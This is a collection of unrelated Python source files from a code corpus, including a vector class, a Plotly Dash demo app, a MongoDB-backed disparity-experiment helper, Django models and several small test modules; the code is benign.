    print(f"Extension: {args.extension}")
    print("-" * (len("Extension: ") + len(args.extension)))
    for info_list in extn_info_lists:
        print(f"{info_list[0]}")
        if info_list[1]:
            print(f"Used by: {info_list[1]}")
        print()
except UnknownExtension:
    print(f"Not sure what '{args.extension}' is...")
| StarcoderdataPython |
5145965 | <filename>Vector.py
import math
import copy
class Vector(list):
    """ Vector.py
        simple list-based vector class

        Notes:
        - Supports 2D and 3D vectors (arithmetic works for any length)
        - Constructor takes a list, a tuple of components, or nothing (3D zero)
        - Has properties x, y and z for ease of use
        - Allows for Vector add/sub/mul with a scalar or another Vector

        Fixes over the original:
        - __sub__ with a scalar subtracts instead of (incorrectly) adding
        - element-wise ops no longer rely on Python 2 map() returning a list,
          so the class works on both Python 2 and 3
        - out() uses print(...) so it is valid on both Python 2 and 3
    """
    def __init__(self, *vec):
        # Vector() -> 3D zero vector; Vector([..]) -> copy of list;
        # Vector(a, b, ...) -> vector of the given components.
        if len(vec) == 0:
            super(Vector, self).__init__([0.0, 0.0, 0.0])
        elif type(vec[0]) is list:
            super(Vector, self).__init__(vec[0])
        else:
            super(Vector, self).__init__([i for i in vec])

    def __add__(self, other):
        """Element-wise sum with another vector/list, or add a scalar to all."""
        if isinstance(other, list):
            return Vector([a + b for a, b in zip(self, other)])
        return Vector([a + other for a in self])

    def __sub__(self, other):
        """Element-wise difference, or subtract a scalar from every component.

        BUG FIX: the scalar branch previously *added* `other`.
        """
        if isinstance(other, list):
            return Vector([a - b for a, b in zip(self, other)])
        return Vector([a - other for a in self])

    def __mul__(self, other):
        """Element-wise (Hadamard) product, or scale by a scalar."""
        if isinstance(other, list):
            return Vector([a * b for a, b in zip(self, other)])
        return Vector([a * other for a in self])

    # Properties of X, Y, Z for convenience
    def __GetX(self):
        return self[0]
    def __SetX(self, value):
        self[0] = value
    x = property(fget=__GetX, fset=__SetX, doc="first component")

    def __GetY(self):
        return self[1]
    def __SetY(self, value):
        self[1] = value
    y = property(fget=__GetY, fset=__SetY, doc="second component")

    def __GetZ(self):
        return self[2]
    def __SetZ(self, value):
        self[2] = value
    z = property(fget=__GetZ, fset=__SetZ, doc="third component")

    def out(self):
        # Debug print; print(x) with one argument is valid Python 2 and 3.
        print(self)

    def Normalized(self):
        """Return a new unit-length vector in the same direction.

        Raises Exception for lengths other than 2 or 3 (as before) and
        ZeroDivisionError for a zero vector.
        """
        if len(self) > 3 or len(self) < 2:
            raise Exception("Normalization not supported on this Vector")
        length = math.sqrt(sum(c * c for c in self))
        return Vector([c / length for c in self])

    def Normalize(self):
        """Normalize this vector in place."""
        n = self.Normalized()
        for i in range(len(n)):
            self[i] = n[i]
if __name__ == "__main__":
    # Ad-hoc demo; the bare `print x` statements below are Python 2 syntax.
    a = Vector()
    a = Vector([2.0, 2.0, 2.0])
    a.x = 4.0
    b = a * Vector(3, 3, 3)
    c = Vector(2.0, 2.0)
    d = Vector(9.0, 7.0)
    dist = d - c
    print dist
    dist.Normalize()
    print dist
    print c + dist
| StarcoderdataPython |
4816567 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
from dash.dependencies import Input, Output
# Sample dataset (US agricultural exports); used by the generate_table demo.
df0 = pd.read_csv('https://gist.githubusercontent.com/chriddyp/c78bf172206ce24f77d6363a2d754b59/raw/c353e8ef842413cae56ae3920b8fd78468aa4cb2/usa-agricultural-exports-2011.csv')
def generate_table(dataframe, max_rows=10):
    """Render a pandas DataFrame as a Dash html.Table (first max_rows rows)."""
    header_cells = [html.Th(column) for column in dataframe.columns]
    visible_rows = min(len(dataframe), max_rows)
    body_rows = []
    for row_index in range(visible_rows):
        record = dataframe.iloc[row_index]
        body_rows.append(
            html.Tr([html.Td(record[column]) for column in dataframe.columns])
        )
    return html.Table([
        html.Thead(html.Tr(header_cells)),
        html.Tbody(body_rows)
    ])
# Scatter-plot dataset: GDP vs life expectancy (2007 snapshot).
df = pd.read_csv(
    'https://gist.githubusercontent.com/chriddyp/5d1ea79569ed194d432e56108a04d188/raw/a9f9e8076b837d541398e999dcbac2b2826a81f8/gdp-life-exp-2007.csv')
# Slider dataset: Gapminder five-year panel, filtered by year in update_figure.
df1 = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/gapminderDataFiveYear.csv')
markdown_text = '''
### Dash and Markdown
Dash apps can be written in Markdown.
Dash uses the [CommonMark](http://commonmark.org/)
specification of Markdown.
Check out their [60 Second Markdown Tutorial](http://commonmark.org/help/)
if this is your first introduction to Markdown!
'''
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
# Colour palette applied to the dark-themed bar chart below.
colors = {
    'background': '#111111',
    'text': '#7FDBFF'
}
app.layout = html.Div(
# style={'backgroundColor': colors['background']},
children=[
html.H1(
children='Hello Dash',
style={
'textAlign': 'center',
# 'color': colors['text']
}),
html.Div(
children='''
Dash: A web application framework for Python.
''',
style={
'textAlign': 'center',
# 'color': colors['text']
}),
dcc.Markdown(children=markdown_text),
dcc.Graph(
id='example-graph-2',
figure={
'data': [
{'x': [1, 2, 3], 'y': [4, 1, 2],
'type': 'bar', 'name': 'SF'},
{'x': [1, 2, 3], 'y': [2, 4, 5],
'type': 'bar', 'name': u'Montréal'},
],
'layout': {
'title': 'Dash Data Visualization',
'plot_bgcolor': colors['background'],
'paper_bgcolor': colors['background'],
'font': {
'color': colors['text']
}
}
}
),
# html.H4(
# children='US Agriculture Exports (2011)'),
# generate_table(df0),
html.Label('Dropdown'),
dcc.Dropdown(
options=[
{'label': 'New York City', 'value': 'NYC'},
{'label': u'Montréal', 'value': 'MTL'},
{'label': 'San Francisco', 'value': 'SF'}
],
value='MTL'
),
html.Label('Multi-Select Dropdown'),
dcc.Dropdown(
options=[
{'label': 'New York City', 'value': 'NYC'},
{'label': u'Montréal', 'value': 'MTL'},
{'label': 'San Francisco', 'value': 'SF'}
],
value=['MTL', 'SF'],
multi=True
),
html.Label('Radio Items'),
dcc.RadioItems(
options=[
{'label': 'New York City', 'value': 'NYC'},
{'label': u'Montréal', 'value': 'MTL'},
{'label': 'San Francisco', 'value': 'SF'}
],
value='MTL'
),
html.Label('Checkboxes'),
dcc.Checklist(
options=[
{'label': 'New York City', 'value': 'NYC'},
{'label': u'Montréal', 'value': 'MTL'},
{'label': 'San Francisco', 'value': 'SF'}
],
value=['MTL', 'SF']
),
html.Label('Text Input'),
dcc.Input(value='MTL', type='text'),
html.Label('Slider'),
dcc.Slider(
min=0,
max=9,
marks={i: 'Label {}'.format(i) if i == 1 else str(i)
for i in range(1, 6)},
value=5,
),
dcc.Graph(
id='life-exp-vs-gdp',
figure={
'data': [
dict(
x=df[df['continent'] == i]['gdp per capita'],
y=df[df['continent'] == i]['life expectancy'],
text=df[df['continent'] == i]['country'],
mode='markers',
opacity=0.7,
marker={
'size': 15,
'line': {'width': 0.5, 'color': 'white'}
},
name=i
) for i in df.continent.unique()
],
'layout': dict(
xaxis={'type': 'log', 'title': 'GDP Per Capita'},
yaxis={'title': 'Life Expectancy'},
margin={'l': 40, 'b': 40, 't': 10, 'r': 10},
legend={'x': 0, 'y': 1},
hovermode='closest'
)
}
),
dcc.Input(id='my-id',
value='initial value',
type='text'),
html.Div(id='my-div'),
dcc.Graph(id='graph-with-slider'),
dcc.Slider(
id='year-slider',
min=df1['year'].min(),
max=df1['year'].max(),
value=df1['year'].min(),
marks={str(year): str(year) for year in df1['year'].unique()},
step=None
)
],
style={'columnCount': 2}
)
@app.callback(
    Output(component_id='my-div', component_property='children'),
    [Input(component_id='my-id', component_property='value')]
)
def update_output_div(input_value):
    """Echo the current text-input value back into the 'my-div' container."""
    message_template = 'You\'ve entered "{text}"'
    return message_template.format(text=input_value)
@app.callback(
    Output('graph-with-slider', 'figure'),
    [Input('year-slider', 'value')])
def update_figure(selected_year):
    """Rebuild the GDP-vs-life-expectancy scatter for the chosen year."""
    year_rows = df1[df1.year == selected_year]

    def _continent_trace(continent):
        # One marker trace per continent, restricted to the selected year.
        rows = year_rows[year_rows['continent'] == continent]
        return dict(
            x=rows['gdpPercap'],
            y=rows['lifeExp'],
            text=rows['country'],
            mode='markers',
            opacity=0.7,
            marker={
                'size': 15,
                'line': {'width': 0.5, 'color': 'white'}
            },
            name=continent,
        )

    traces = [_continent_trace(c) for c in year_rows.continent.unique()]
    layout = dict(
        xaxis={'type': 'log', 'title': 'GDP Per Capita',
               'range': [2.3, 4.8]},
        yaxis={'title': 'Life Expectancy', 'range': [20, 90]},
        margin={'l': 40, 'b': 40, 't': 10, 'r': 10},
        legend={'x': 0, 'y': 1},
        hovermode='closest',
        transition={'duration': 0},
    )
    return {'data': traces, 'layout': layout}
# Launch the Dash development server (debug enables hot reload).
if __name__ == '__main__':
    app.run_server(debug=True)
| StarcoderdataPython |
114230 | <filename>disparity/helpers.py<gh_stars>1-10
import csv
import math
import time
import json
import numpy as np
from beautifultable import BeautifulTable
from pymongo import MongoClient
class Helper:
    """Utility driving disparity experiments over a (possibly anonymised)
    worker dataset stored in MongoDB or in pre-exported CSV files."""
    def __init__(self,
                 db_name="WorkerSet100K",
                 collection_name="workers",
                 configuration="transparent",
                 N=50,
                 f=None,
                 selected=None,
                 k=None):
        """
        Initializes helper.
        :param db_name: name of the database.
        :param collection_name: name of the collections.
        :param configuration: can be either 'transparent', 'opaque_process', 'opaque_dataset'.
        :param N: number of workers to select.
        :param f: variant value stored for later use — presumably a selection
            function parameter forwarded to the disparity metric; confirm
            against the metric classes.
        :param selected: variant value stored for later use (see run_experiments).
        :param k: anonymisation level; in 'opaque_dataset' mode it picks the
            '<N>/<k>.csv' export to load.
        """
        self.db_name = db_name
        self.configuration = configuration
        self.limit = N
        self.collection = self.__get_collection(db_name, collection_name)
        self.k = k
        self.selected = selected
        self.f = f
    @staticmethod
    def __get_collection(db_name, collection_name):
        # Connects to the default local MongoDB instance.
        client = MongoClient()
        db = client[db_name]
        return db[collection_name]
    def __retrieve_simulated_dataset(self):
        """Load up to self.limit simulated workers, bucketing continuous
        attributes into ranges; 'opaque_dataset' mode reads an anonymised
        CSV export instead of Mongo."""
        def convert_to_ranges(worker, year_of_birth=True, years_of_experience=True):
            if year_of_birth:
                # YearOfBirth are combined categorically on a 10-year basis,
                # i.e. 1993 will be considered in the 1990-1999 range
                worker["YearOfBirth"] = int(worker["YearOfBirth"] / 10) * 10
            if years_of_experience:
                # YearsOfExperience are combined categorically on a 5-year basis,
                # i.e. 13 will be considered in the 10-14 range
                worker["YearsOfExperience"] = math.floor(worker["YearsOfExperience"] / 5) * 5
            return worker
        documents = []
        if self.configuration != 'opaque_dataset':
            for w in self.collection.find().limit(self.limit):
                w = convert_to_ranges(w)
                documents.append(w)
        else:
            with open('./datasets/simulated/opaque_dataset/' + str(self.limit) + '/' + str(self.k) + '.csv', mode='r') as f:
                reader = csv.DictReader(f)
                rows = list(reader)
                for row in rows:
                    w = dict(row)
                    yob = True
                    yoe = True
                    w["LanguageTest"] = int(w["LanguageTest"])
                    w["ApprovalRate"] = int(w["ApprovalRate"])
                    # Values starting with '*' or '[' are already anonymised
                    # (suppressed/generalised), so skip range conversion.
                    if w["YearOfBirth"][:1] in ['*', '[']:
                        yob = False
                    if w["YearsOfExperience"][:1] in ['*', '[']:
                        yoe = False
                    w = convert_to_ranges(w, year_of_birth=yob, years_of_experience=yoe)
                    documents.append(w)
        return documents
    def get_documents(self):
        """Return up to self.limit worker documents; simulated 'WorkerSet*'
        databases get the range-bucketing treatment above."""
        if self.db_name.startswith('WorkerSet'):
            return self.__retrieve_simulated_dataset()
        documents = []
        for w in self.collection.find().limit(self.limit):
            documents.append(w)
        return documents
    @staticmethod
    def __get_simulated_dataset_attributes_list(worker):
        # Seed an {attribute_name: []} dict from one worker's keys.
        attributes = {}
        for key in worker:
            attributes[key] = []
        # Remove non-attributes from attributes dictionary. This includes qualifications such as LanguageTest and
        # ApprovalRate
        attributes.pop("_id")
        attributes.pop("id")
        attributes.pop("LanguageTest")
        attributes.pop("ApprovalRate")
        return attributes
    def get_attributes(self, documents):
        """Collect the distinct values observed for each worker attribute.
        :param documents: non-empty list of worker dicts (first one defines the keys).
        :return: dict mapping attribute name -> list of distinct values.
        """
        worker = documents[0]
        if self.db_name.startswith('WorkerSet'):
            attributes = self.__get_simulated_dataset_attributes_list(worker)
        else:
            raise RuntimeError('Function that handles attributes is not specified for the dataset provided.')
        # Add different attribute values under attribute name
        for i in documents:
            for j in attributes:
                # add new values of the attribute to the list values
                if i[j] not in attributes[j]:
                    attributes[j].append(i[j])
        if self.configuration == 'opaque_dataset':
            # Drop attributes that anonymisation collapsed to a single value.
            for j in attributes.copy():
                if len(attributes[j]) <= 1:
                    attributes.pop(j)
        return attributes
    def build_tables(self, name, values, time_values, functions=None, percentages=None):
        """
        Pretty-print the metric values and their timings as two tables.
        :param name: title of the values table.
        :param percentages: variant keys used as '<p>%' column headers in
            'opaque_process' runs.
        :param functions: variant keys used as 'f<k>' column headers otherwise.
        :param time_values: rows with the same layout as `values`, holding
            execution times.
        :param values: list of rows; row[0] is the method label, the rest are
            metric values per variant.
        :return: the two rendered tables as strings (values, timings).
        """
        def build_table(title, values):
            b_table = BeautifulTable(max_width=200)
            t_headers = [title]
            if self.configuration == 'opaque_process':
                for key in percentages:
                    t_headers.append(str(key) + '%')
            else:
                for key in functions:
                    t_headers.append('f' + str(key))
            b_table.column_headers = t_headers
            for i in range(len(values)):
                b_table.append_row(values[i][:])
            return b_table
        table = build_table(name, values)
        table.numeric_precision = 4
        print(name)
        print(table)
        timetable = build_table('TIMINGS', time_values)
        print('-----------------------')
        print('TIMINGS')
        print(timetable)
        return str(table), str(timetable)
    @staticmethod
    def run_algorithm(algorithm, method, num_of_runs=1):
        """
        Run `method` num_of_runs times, score each result with
        `algorithm.metric`, and average both scores and wall-clock times.
        :param algorithm: object exposing a metric(result) callable.
        :param method: zero-argument callable producing a result to score.
        :param num_of_runs: number of repetitions to average over.
        :return: (mean metric value, mean execution time in seconds)
        """
        value_per_run = []
        time_per_run = []
        for i in range(num_of_runs):
            start = time.time()
            value_per_run.append(algorithm.metric(method()))
            end = time.time()
            time_per_run.append(end - start)
        return np.mean(value_per_run), np.mean(time_per_run)
    def run_experiments(self, quantify_disparity_metric, workers, attributes, functions=None, percentages=None,
                        bins='preset', criterion='avg', normalize=True, scaling='standardization'):
        """
        Evaluate one disparity metric (KL or EMD, chosen by class __name__)
        over every variant, for all five selection methods.
        :param normalize: EMD-only flag forwarded to the metric.
        :param scaling: KL-only scaling mode forwarded to the metric.
        :param criterion: EMD-only aggregation criterion.
        :param quantify_disparity_metric: metric class to instantiate per variant.
        :param workers: worker documents (see get_documents).
        :param attributes: attribute/value map (see get_attributes).
        :param functions: variant map used outside 'opaque_process' mode.
        :param percentages: variant map used in 'opaque_process' mode.
        :param bins: binning strategy forwarded to the metric.
        :return: (experiment name, value rows, timing rows) — rows ordered
            unbalanced, r-unbalanced, balanced, r-balanced, exhaustive.
        """
        if self.configuration == 'opaque_process':
            variants = percentages
        else:
            variants = functions
        all_values = [
            ["unbalanced"],
            ["r-unbalanced"],
            ["balanced"],
            ["r-balanced"],
            ["exhaustive"]
        ]
        all_time_values = [
            ["unbalanced"],
            ["r-unbalanced"],
            ["balanced"],
            ["r-balanced"],
            ["exhaustive"]
        ]
        name = 'undefined'
        for key in variants:
            if quantify_disparity_metric.__name__ == 'KL':
                name = self.db_name + '-KL-' + self.configuration + '-scaling-' + scaling + '-workers-' + str(self.limit)
                quantify_disparity = quantify_disparity_metric(workers, attributes,
                                                               configuration=self.configuration,
                                                               f=variants[key],
                                                               selected=variants[key],
                                                               bins=bins,
                                                               scaling=scaling)
            else:
                name = self.db_name + '-EMD-' + self.configuration + '-bins-' + bins + '-normalize-' + str(normalize) + '-criterion-' \
                       + criterion + str(self.limit)
                quantify_disparity = quantify_disparity_metric(workers, attributes,
                                                               configuration=self.configuration,
                                                               f=variants[key],
                                                               selected=variants[key],
                                                               bins=bins, normalize=normalize, criterion=criterion)
            methods = [
                quantify_disparity.unbalanced,
                quantify_disparity.random_unbalanced,
                quantify_disparity.balanced,
                quantify_disparity.random_balanced,
                quantify_disparity.exhaustive
            ]
            for i in range(len(methods)):
                # The two randomised methods (indices 1 and 3) are averaged
                # over 5 runs; the deterministic ones run once.
                num_of_times = 5 if i in [1, 3] else 1
                value, exec_time = self.run_algorithm(quantify_disparity, methods[i], num_of_times)
                all_values[i].append(value)
                all_time_values[i].append(exec_time)
        return name, all_values, all_time_values
| StarcoderdataPython |
3534124 | <filename>guanabara/Exercicios/utilidades/cor/__init__.py
# ANSI escape lookup table. 'z' resets all styling; single letters are
# foreground colours; two-letter keys are foreground+background pairs.
c = {'z': '\033[m'}
l = ['w', 'r', 'g', 'y', 'b', 'm', 'c', 'k']
# Foreground codes: SGR 30-37 map onto the letters of `l` in order.
for fg_index, fg_code in enumerate(range(30, 38)):
    c[l[fg_index]] = f'\033[{fg_code}m'
# Combined codes: background SGR 40-47 appended to each foreground.
for fg_index, fg_code in enumerate(range(30, 38)):
    for bg_index, bg_code in enumerate(range(40, 48)):
        c[l[fg_index] + l[bg_index]] = f'\033[{fg_code};{bg_code}m'
def clr(text='', value='z'):
    """Wrap `text` in the escape for `value`, resetting styling afterwards."""
    return c[value] + str(text) + c['z']
| StarcoderdataPython |
4829225 | """Test template loading functions."""
import pytest
import flatware.template_loading as loading
def test_load_file(tmpdir):
    """A template on disk is loaded back verbatim."""
    tmpdir.join("recipe").write("Plate text")
    loaded = loading.load_template("recipe", template_dir=str(tmpdir))
    assert loaded == "Plate text"
def test_list_plates(tmpdir):
    """Every template file in the directory appears in the listing."""
    tmpdir.join("component").write("Plate text")
    names = loading.get_avaliable_template_names(template_dir=str(tmpdir))
    assert names == ["component"]
def test_load_plate_does_not_exist(tmpdir):
    """Loading a missing template raises FileNotFoundError with a clear message."""
    with pytest.raises(FileNotFoundError) as excinfo:
        loading.load_template("ghost", str(tmpdir))
    assert "No template with name 'ghost' found!" in excinfo.value.args[0]
| StarcoderdataPython |
6450588 | from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from conversion_imagenet import TestModels
def get_test_table():
    """Map framework -> model -> list of emitters to exercise.

    Only the Keras emitter is currently enabled for the darknet YOLO
    models; the other emitters were disabled in the original table.
    """
    yolov2_emitters = [TestModels.keras_emit]
    yolov3_emitters = [TestModels.keras_emit]
    return {
        'darknet': {
            'yolov2': yolov2_emitters,
            'yolov3': yolov3_emitters,
        }
    }
def test_darknet():
    """Drive the shared conversion harness over the darknet test table."""
    tester = TestModels(get_test_table())
    tester._test_function('darknet', tester.darknet_parse)
# Allow running this module directly, outside a test runner.
if __name__ == '__main__':
    test_darknet()
| StarcoderdataPython |
1638831 | # -*- coding: utf-8 -*-
from . import TenantWrappedCommand
from django.contrib.staticfiles.management.commands import collectstatic
class Command(TenantWrappedCommand):
    # Wraps Django's built-in collectstatic command via TenantWrappedCommand
    # (presumably to run it in a tenant's context — see the base class).
    COMMAND = collectstatic.Command
| StarcoderdataPython |
6422023 | # Generated by Django 2.2.1 on 2019-06-29 14:10
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds meeting numbering plus attendance and
    # summary counter fields, each with a safe default.
    dependencies = [
        ('smarttm_web', '0030_attendance'),
    ]
    operations = [
        migrations.AddField(
            model_name='meeting',
            name='meeting_no',
            field=models.CharField(default='x1', max_length=20),
            # 'x1' only back-fills existing rows; it is not kept as a default.
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='meeting_summary',
            name='members_absent_count',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='meeting_summary',
            name='members_present_count',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='summary',
            name='attendance_percent',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='summary',
            name='last_two_meetings_att',
            field=models.BooleanField(default=True),
        ),
        migrations.AddField(
            model_name='summary',
            name='tt_percent',
            field=models.IntegerField(default=0),
        ),
    ]
| StarcoderdataPython |
389549 | <reponame>VictorZXY/meowjong<filename>evaluation/hand_calculation/yaku_list/tanyao.py
from typing import List
from evaluation.hand_calculation.tile_constants import YAOCHUUHAI
from evaluation.hand_calculation.yaku import Yaku
class Tanyao(Yaku):
    """
    Tanyao (All Simples): a hand with no terminals and honours.
    """
    def __init__(self):
        super().__init__()
    def set_attributes(self):
        # Static yaku metadata; worth 1 han whether open or closed.
        self.name = 'Tanyao'
        self.english = 'All Simples'
        self.japanese = '断幺九'
        self.chinese = '断幺九'
        self.han_open = 1
        self.han_closed = 1
        self.is_yakuman = False
    def is_condition_met(self, hand: List[List[int]], *args):
        # Met iff no set in the hand contains any terminal/honour tile.
        return all(item[index] == 0 for item in hand for index in YAOCHUUHAI)
| StarcoderdataPython |
9614433 | <gh_stars>0
from django.db import models
#from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from django.conf import settings
from django.core.urlresolvers import reverse
import pathlib
import re
class Collision(models.Model):
    """One detected blob within an experiment's image set."""
    experiment_id = models.CharField(max_length=20)
    blob_id = models.IntegerField()
    class Meta:
        # A blob id is only unique within its experiment.
        unique_together = ('experiment_id', 'blob_id')
    def __unicode__(self):
        # NOTE(review): Python-2 style __str__ (consistent with the old
        # django.core.urlresolvers import used by this file).
        return 'XID {}'.format(self.xid())
    def xid(self):
        """Return the canonical '<experiment_id>-<5-digit blob id>' identifier."""
        return '{}-{:05}'.format(self.experiment_id, self.blob_id)
    def get_absolute_url(self):
        return reverse('collisions:collision', kwargs={
            'eid': self.experiment_id,
            'bid': self.blob_id,
        })
    def image_file(self):
        """Path of this collision's rendered PNG under COLLISION_IMAGES."""
        return (settings.COLLISION_IMAGES /
                '{}_{:05}.png'.format(self.experiment_id, self.blob_id))
    def answer_count(self):
        """Number of curated answers recorded for this collision."""
        # Fixed: the original filtered on a nonexistent ``object_pk`` field
        # (a django-contrib-comments leftover); CuratedAnswer's FK to this
        # model is ``collision``.
        return CuratedAnswer.objects.filter(collision=self).count()
    @staticmethod
    def find_images():
        """Yield (experiment_id, blob_id) for every matching PNG on disk."""
        # Raw string so the regex escapes (\d) reach `re` untouched instead
        # of being treated as (deprecated) string-literal escape sequences.
        r = re.compile(r"(?P<eid>\d{8}_\d{6})_(?P<bid>\d{5})\.png")
        for f in settings.COLLISION_IMAGES.glob('*.png'):
            rm = r.match(f.name)
            if not rm:
                continue
            eid, bid = rm.groups()
            yield eid, int(bid)
class CuratedAnswer(models.Model):
    """A curator's worm-count judgement for one collision image."""
    # Two-digit codes: multiples of 10 are exact counts, the in-between
    # '.5' codes mean "strictly between the neighbouring counts".
    ANSWERS = (
        ('00', 'No worms'),
        ('05', '>0, <1 worms'),
        ('10', '1 worm'),
        ('15', '>1, <2 worms'),
        ('20', '2 worms'),
        ('25', '>2, <3 worms'),
        ('30', '3 worms'),
        ('35', '>3 worms'),
    )
    collision = models.ForeignKey(Collision, related_name='answers')
    answer = models.CharField(max_length=60, choices=ANSWERS)
    # Not editable in forms — expected to be set from the logged-in user.
    curator = models.ForeignKey(User, editable=False, related_name='collision_answer_user')
    starred = models.BooleanField(default=False)
    class Meta:
        # Each curator may answer a given collision only once.
        unique_together = ('collision', 'curator')
    def __unicode__(self):
        # NOTE(review): Python-2 style; under Python 3 Django calls __str__.
        return 'XID {}, {} said {}{}'.format(
            self.collision.xid(),
            self.curator.username, self.answer, ' !!!' if self.starred else '')
| StarcoderdataPython |
1773060 | from django.db import models
class Category(models.Model):
    """A named grouping of products."""
    name = models.CharField(max_length=150)
    def __str__(self):
        return self.name
class Product(models.Model):
    """A food product with its nutriscore and per-100g nutrition values."""
    name = models.CharField(max_length=150)
    # Single character — presumably a Nutri-Score letter grade; confirm
    # against the data source.
    nutriscore = models.CharField(max_length=1)
    url = models.URLField()
    image_url = models.URLField(default=None)
    # Nutrient quantities per 100 g of product (field-name convention).
    fat_100g = models.FloatField(default=None)
    saturated_fat_100g = models.FloatField(default=None)
    sugars_100g = models.FloatField(default=None)
    salt_100g = models.FloatField(default=None)
    # PROTECT: a category cannot be deleted while products still reference it.
    category = models.ForeignKey(Category, on_delete=models.PROTECT)
    def __str__(self):
        return self.name
| StarcoderdataPython |
8190898 | from revarie import Revarie
from revarie import Variogram
from revarie import fvariogram
import numpy as np
import time
import datetime
from .output import write
from pathlib import Path
def bench_variogram(tlimit=15, path="."):
    """
    Run timing benchmark test for variogram class. Results are formatted and
    printed to a file named "variogram_timing###.dat".

    Parameters
    ----------
    tlimit : float
        Approximate wall time limit for tests to run.
    path : str, path-like
        Path for results file to be printed to
    """
    started = time.time()
    size = 50
    sizes = []
    timings = []
    # Grow the problem size ~20% per iteration until the time budget is spent.
    while time.time() - started < tlimit:
        run_start = time.time()
        sizes.append(size)
        coords = np.random.uniform(0, 1, size)
        field = np.random.uniform(0, 1, size)
        Variogram(coords, field)
        timings.append(time.time() - run_start)
        size = int(size * 1.2)
    # Pick the first unused variogram_timing###.dat serial under `path`.
    serial = 0
    while (Path(path) / "variogram_timing{:03d}.dat".format(serial)).is_file():
        serial += 1
    fname = Path("variogram_timing{:03d}.dat".format(serial))
    write(np.asarray(sizes), np.asarray(timings), Path(path) / fname, "Variogram", "1-D")
def bench_revarie(tlimit=15, path="."):
    """
    Run timing benchmark test for revarie class. Results are formatted and
    printed to a file named "revarie_timing###.dat".

    Parameters
    ----------
    tlimit : float
        Approximate wall time limit for tests to run.
    path : str, path-like
        Path for results file to be printed to
    """
    started = time.time()
    # Fixed spherical variogram model shared by every timed run.
    nugget = 0
    sill = 1
    model_range = 0.3
    model = fvariogram("func", "sph", [nugget, sill, model_range])
    mean = 1
    size = 50
    sizes = []
    timings = []
    # Grow the problem size ~20% per iteration until the time budget is spent.
    while time.time() - started < tlimit:
        run_start = time.time()
        sizes.append(size)
        coords = np.random.uniform(0, 1, size)
        Revarie(coords, mean, sill, model).genf()
        timings.append(time.time() - run_start)
        size = int(size * 1.2)
    # Pick the first unused revarie_timing###.dat serial under `path`.
    serial = 0
    while (Path(path) / "revarie_timing{:03d}.dat".format(serial)).is_file():
        serial += 1
    fname = Path("revarie_timing{:03d}.dat".format(serial))
    write(np.asarray(sizes), np.asarray(timings), Path(path) / fname, "Revarie", "1-D")
def suite(tlimit=30, path="."):
    """
    Run timing benchmark test for both the revarie and variogram classes.
    Results are formatted and printed to the per-benchmark .dat files.
    Each benchmark gets an equal share of the time budget.

    Parameters
    ----------
    tlimit : float
        Approximate wall time limit for tests to run.
    path : str, path-like
        Path for results files to be printed to
    """
    per_benchmark = tlimit / 2
    for benchmark in (bench_variogram, bench_revarie):
        benchmark(per_benchmark, path=path)
| StarcoderdataPython |
6569544 | <reponame>BrianOtieno/tClinix<gh_stars>0
from bcrypt import gensalt, hashpw
from flask import current_app
from flask_login import UserMixin
from sqlalchemy import Column, Float, Integer, String
from sqlalchemy.orm import relationship
from threading import Thread
from tClinix import db , scheduler
from tClinix.base.custom_base import CustomBase
class User(CustomBase, UserMixin):
    """Application user; passwords are bcrypt-hashed before storage."""
    __tablename__ = 'User'
    id = Column(Integer, primary_key=True)
    type = Column(String, default='admin')
    name = Column(String(120), unique=True)
    email = Column(String(120), unique=True)
    access_rights = Column(String(120))
    password = Column(String(30))
    # tasks = relationship('Task', back_populates='user')
    def update(self, **kwargs):
        """Hash the incoming password, store the hash (Vault in production,
        the password column otherwise), then delegate to CustomBase.update.

        Fixed: the dataset's anonymisation placeholders (`<PASSWORD>`) left
        this method syntactically invalid; the stored value is reconstructed
        as the decoded bcrypt hash — confirm against the original project.
        """
        # bcrypt works on bytes; decode for storage as text.
        hashed = hashpw(kwargs.pop('password').encode('utf8'), gensalt())
        if current_app.production:
            # Production keeps the hash out of the DB and in Vault instead.
            current_app.vault_client.write(
                f'secret/data/user/{kwargs["name"]}',
                data={'password': hashed.decode('utf-8')}
            )
        else:
            kwargs['password'] = hashed.decode('utf-8')
        super().update(**kwargs)
    def __repr__(self):
        return self.name
| StarcoderdataPython |
395712 | <filename>angrytux/model/game_objects/enemies/enemy_states/HittedState.py
from angrytux.model.game_objects.enemies.enemy_states.DeadState import DeadState
from angrytux.model.game_objects.enemies.enemy_states.EnemyState import EnemyState
class HittedState(EnemyState):
    """Transient state an enemy enters right after being hit: it stays on
    screen but non-collidable until its timer expires, then dies."""
    def __init__(self, enemy):
        super().__init__(enemy)
        # FPS * seconds
        self.live_time = 60 * 0.5
    def move(self) -> bool:
        """
        Tick the hit timer; switch to DeadState once it runs out.
        :return: True if the state changed, False otherwise
        """
        self.live_time -= 1
        if self.live_time != 0:
            return False
        self._enemy.state = DeadState(self._enemy)
        return True
    def hit(self) -> None:
        """Hitting an already-hit enemy has no effect."""
        pass
    @property
    def delete(self) -> bool:
        # Keep the enemy in the world while the hit phase plays out.
        return False
    @property
    def collidable(self) -> bool:
        """A freshly hit enemy cannot collide with missiles again."""
        return False
| StarcoderdataPython |
212899 | <reponame>mbatchkarov/dc_evaluation
import pytest
from numpy.testing import assert_array_equal
from discoutils.thesaurus_loader import Vectors
from discoutils.tokens import DocumentFeature, Token
# Shared fixtures: one document feature of each shape, plus the "unknown"
# variants that must be absent from the small test vector files.
DIM = 10
unigram_feature = DocumentFeature('1-GRAM', (Token('a', 'N'),))
unk_unigram_feature = DocumentFeature('1-GRAM', ((Token('unk', 'UNK')),))
bigram_feature = DocumentFeature('2-GRAM', (Token('a', 'N'), Token('b', 'V')))
unk_bigram_feature = DocumentFeature('2-GRAM', (Token('a', 'N'), Token('UNK', 'UNK')))
an_feature = DocumentFeature('AN', (Token('c', 'J'), Token('a', 'n')))
